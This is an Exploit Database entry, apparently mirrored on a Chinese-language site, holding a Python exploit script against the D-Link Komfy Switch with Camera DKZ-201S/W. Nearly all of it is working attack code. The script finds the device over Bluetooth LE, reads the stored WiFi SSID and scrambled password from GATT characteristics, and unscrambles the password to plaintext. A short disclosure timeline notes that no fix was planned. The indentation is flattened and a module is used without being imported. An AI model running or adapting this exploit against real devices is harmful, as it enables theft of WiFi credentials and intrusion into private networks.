Komfy Switch with Camera DKZ-201S/W – WiFi Password Disclosure

• Exploit Database
• 13 阅读

• 作者： Jason Doyle
  日期： 2016-10-26
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/40633/

• #!/usr/bin/python
  # Exploit Title: Komfy Switch with Camera Wifi Password Disclosure via Bluetooth BLE
  # Date: Oct 13, 2016
  # Exploit Author: Jason Doyle @_jasondoyle
  # Vendor Homepage: http://us.dlink.com/products/connected-home/komfy-switch-with-camera/
  # HW Model: DKZ-201S/W
  # SW Version: 1.0
  # Tested on: Ubuntu 16.04 LTS / Python 2.7
  # Disclosure Timeline: 10/11/16 Reported vulnerability to D-Link
  #10/11/16 D-Link responded - The Komfy switch will be discontinued 12/30/16. No fix planned.
  
  # Vulnerability Summary
  #It is possible for an unauthenticated, remote attacker to retrieve the Komfy device's associated wifi ssid and password over bluetooth (4.0/BLE).
  
  # Vulnerability Details
  #https://github.com/jasondoyle/Komfy-Switch-Wifi-Password-Disclosure
  
  
  
  # Author: Jason Doyle @_jasondoyle
  # Komfy Switch with Camera wifi password disclosure exploit script
  import re, base64
  from bluepy.btle import Scanner
  from gattlib import GATTRequester
  
  #lookup table to unscramble
  base64Alphabet ="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=" # '=' used for padding
  komfy64Alphabet = "qazwersdfxcvbgtyhnmjklpoiu5647382910+/POIKLMJUYTGHNBVFREWSDCXZAQ$" # '$' used for padding
  
  scanner = Scanner()
  
  devices = scanner.scan(5.0)
  bAddr = ""
  for dev in devices:
  if "6c:72:20" in dev.addr and dev.getValueText(1) and dev.getValueText(7) and dev.getValueText(9):
  bAddr = dev.addr
  print "[+] Komfy switch found: %s (%s), RSSI=%d dB" % (dev.addr, dev.addrType, dev.rssi)
  if not bAddr:
  print "No Komfy switches found"
  sys.exit(1)
  
  req = GATTRequester(bAddr.encode('ascii','ignore'), False, 'hci0')
  req.connect(True, 'public', 'none', 0, 78)
  
  #request SSID
  wifiSsid = req.read_by_uuid("0xb006")[0]
  reg = re.search(r"(:\s\"(.*)\")", wifiSsid)
  wifiSsid = reg.groups()[1].replace("\\","")
  
  #request komfy encoded wifi password
  wifiPassKomfy64 = req.read_by_uuid("0xb007")[0]
  reg = re.search(r"(:\s\"(.*)\")", wifiPassKomfy64)
  wifiPassKomfy64 = reg.groups()[1].replace("\\","")
  
  #convert password to real base64
  wifiPassBase64 = ""
  for char in wifiPassKomfy64:
  i = komfy64Alphabet.index(char)
  wifiPassBase64 += base64Alphabet[i]
  
  wifiPass = base64.b64decode(wifiPassBase64)
  print "[+] Wifi password found for Komfy Switch [%s] SSID: %s Password: %s" % (bAddr, wifiSsid, wifiPass)